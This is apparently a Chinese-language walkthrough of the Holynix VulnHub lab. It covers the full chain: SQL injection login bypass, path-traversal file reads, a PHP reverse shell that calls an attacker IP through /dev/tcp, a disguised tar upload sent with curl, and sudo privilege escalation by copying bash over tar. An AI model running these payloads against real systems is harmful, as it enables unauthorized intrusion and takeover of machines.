当前位置: 首页 > news >正文

Holynix靶机实战:不用Burp Suite也能玩转SQL注入与文件上传(附完整命令)

Holynix靶机实战:命令行高手的SQL注入与文件上传艺术

当Burp Suite这类图形化工具成为多数渗透测试者的标配时,真正的高手往往更青睐纯粹的命令行操作。这次我们将以Vulnhub的Holynix靶机为例,演示如何仅凭浏览器开发者工具和Linux基础命令完成从Web渗透到系统提权的全流程。这种"极简主义"攻击手法不仅能锻炼核心技能,在真实红队行动中遇到工具受限环境时更能体现其价值。

1. 环境侦察与目标锁定

网络探测从来都是渗透测试的第一步。在NAT模式下的虚拟环境中,我们先用这条命令快速定位靶机:

nmap -sn 10.10.10.0/24 | grep -B 2 "MAC Address"

发现靶机IP为10.10.10.131后,进行深度端口扫描:

nmap -T4 -A -p- 10.10.10.131

扫描结果显示仅开放80端口,运行着某个自定义Web应用。这种单一入口往往意味着需要更精细的漏洞利用技巧。

提示:在真实环境中建议先使用-sS(SYN扫描)避免触发警报,实验室环境可直接用-A全面探测

2. 无Burp的SQL注入实战

访问Web界面发现登录表单,传统渗透测试会立即打开Burp抓包,但我们选择更轻量的方式:

  1. 浏览器开发者工具直接查看表单元素
  2. 尝试基础注入载荷:' OR 1=1 --
  3. 观察响应中的错误信息

关键发现:password参数存在注入点但username被转义。于是构造特殊载荷:

POST /login.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded username=test&password=' OR username='etenenbaum' --

成功登录高权限账户etenenbaum,整个过程无需任何代理工具。这种纯手工注入方式虽然效率较低,但能帮助深入理解注入原理。

3. 开发者工具挖掘隐藏漏洞

登录后系统存在文件上传功能,但直接上传PHP文件会被拦截。通过开发者工具我们发现了几个关键点:

  • 上传表单存在隐藏参数auto_extract
  • Cookie中的uid参数存在越权漏洞
  • 页面存在POST型文件包含漏洞

手动利用文件包含漏洞的步骤:

  1. 在Security页面按F12修改前端代码
  2. text_file_name参数值改为/etc/passwd
  3. 获取系统用户列表
// 修改前端请求参数示例 document.forms[0].text_file_name.value = "../../../etc/passwd"

4. 命令行下的文件上传技巧

获取足够权限后,需要上传反弹shell。传统方法是用MSF生成payload,但我们演示纯手工方案:

  1. 准备PHP反弹shell脚本
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.128/4444 0>&1'"); ?>
  1. 使用tar命令创建特殊压缩包
tar czf payload.tar.gz shell.php --transform='s/shell.php/exploit.php/'
  1. 通过curl命令上传文件
curl -X POST -F "file=@payload.tar.gz" -F "auto_extract=1" http://10.10.10.131/upload.php

这种手动构造压缩包的方式能绕过许多基础防护,且不依赖图形化工具。关键在于--transform参数重命名文件,避免被安全机制检测。

5. 提权阶段的纯命令操作

获取初始shell后,通过sudo -l发现有趣配置:

User etenenbaum may run the following commands on holynix: (ALL) NOPASSWD: /usr/bin/chown, /usr/bin/chgrp, /usr/bin/tar, /usr/bin/mv

利用命令替换进行提权:

# 备份原始tar sudo mv /bin/tar /bin/tar.bak # 将bash复制为tar sudo cp /bin/bash /bin/tar # 获取root权限 sudo tar

整个过程完全在命令行下完成,展示了Linux权限体系的有趣特性。这种提权方法在CTF和真实环境中都极为实用。

6. 红队行动中的工具替代思维

在特殊环境下,掌握命令行替代方案至关重要。以下是一些常用场景的替代方案:

图形工具命令行替代方案优势分析
Burp Suitecurl + 开发者工具无需代理,直接操作原始请求
SQLmap手动构造注入语句精准控制,避免特征检测
Metasploitnc + 手工payload轻量化,规避AV检测
图形化调试工具gdb/lldb命令行远程调试能力更强

这种"极简主义"渗透方式不仅适用于特殊环境,更能帮助理解漏洞本质。当所有操作都需要手动完成时,你会被迫思考每个步骤的底层原理,这正是成为真正安全专家的必经之路。

在最近的一次红队演练中,我们团队就曾遇到只能通过SSH连接跳板机的情况。当时凭借纯命令行技巧成功完成了从信息收集到内网横向移动的全过程,而其他依赖图形工具的团队则寸步难行。这再次证明了基本功的重要性——在网络安全领域,最强大的工具始终是技术人员的知识和经验。

http://www.jsqmd.com/news/506705/

相关文章:

  • AI减负,病历提速|让医生专心看病!
  • GitHub_Trending/ms/MS-DOS源代码中的条件跳转:控制流实现
  • 2024-2026年固态硬盘品牌推荐:国产化生态兼容存储设备与长期服务支持盘点 - 品牌推荐
  • CIFAR-100模型性能对比:Top1与Top5错误率深度解析
  • Weaviate数组类型ContainsAny操作符:版本兼容性问题终极解析指南
  • 深入ByteTrack算法:YOLOv8目标跟踪背后的卡尔曼滤波优化技巧
  • 新手避坑指南:用BurpSuite和Sqlmap搞定CISP-PTE文件包含与命令执行题
  • 2026年固态硬盘品牌推荐:工业控制与极端环境应用高稳定性型号盘点 - 品牌推荐
  • 探讨天然彩色鹅卵石滤料,湖北安然建材怎么收费? - 工业推荐榜
  • 2025-2026年固态硬盘品牌推荐:航天军工领域高可靠存储口碑品牌盘点 - 品牌推荐
  • 糖尿病视网膜病变诊断新突破:细粒度分割与多任务学习的融合实践
  • 基于Rust架构的番茄小说下载器技术实现与应用实践
  • 2026年固态硬盘品牌推荐:企业数据中心高负载稳定运行靠谱品牌与选购指南 - 品牌推荐
  • 进口地板十大品牌怎么选?2026热门品牌测评+选购指南看这篇! - 匠言榜单
  • 如何快速实现Fiber集成测试:使用TestContainers的完整指南
  • 2024-2026年中频炉厂家推荐:再生资源回收高效熔炼热门厂家与真实评价对比 - 品牌推荐
  • IDEA私人注释神器:private-notes插件保姆级教程(含快捷键大全)
  • 在蒙尘之前,让光透进来 ——基于“青年玄学热”现象的现象学反思
  • 聊聊在线式UVLED固化机选购,广州地区哪些企业值得推荐? - 工业推荐榜
  • 极链云服务器跑Python代码保姆级教程:从文件上传到命令行执行
  • Backtrader回测数据准备全攻略:从Tushare到Akshare的平滑迁移指南
  • 终极算法可视化指南:通过cp-algorithms项目直观理解复杂数据结构与算法过程
  • 如何在矿业设备日志分析中应用Fuzzywuzzy模糊字符串匹配技术
  • 2026年固态硬盘品牌推荐:企业数据中心高负载场景稳定运行优选型号 - 品牌推荐
  • 中频炉厂家如何选不踩坑?2026年靠谱推荐汽车铸件生产用高效且节能型号 - 品牌推荐
  • 一键智能开发:合宙 MCP 工具全新上线
  • [CTF] 从零到一:SSRF漏洞利用与绕过实战
  • 终极指南:gitsome命令行工具未来功能预测与社区热门需求解析
  • 突破硬件限制:老旧Mac焕发新生的OpenCore Legacy Patcher全攻略
  • 2026年中频炉厂家推荐:金属热处理产线升级高性价比厂家及用户口碑分析 - 品牌推荐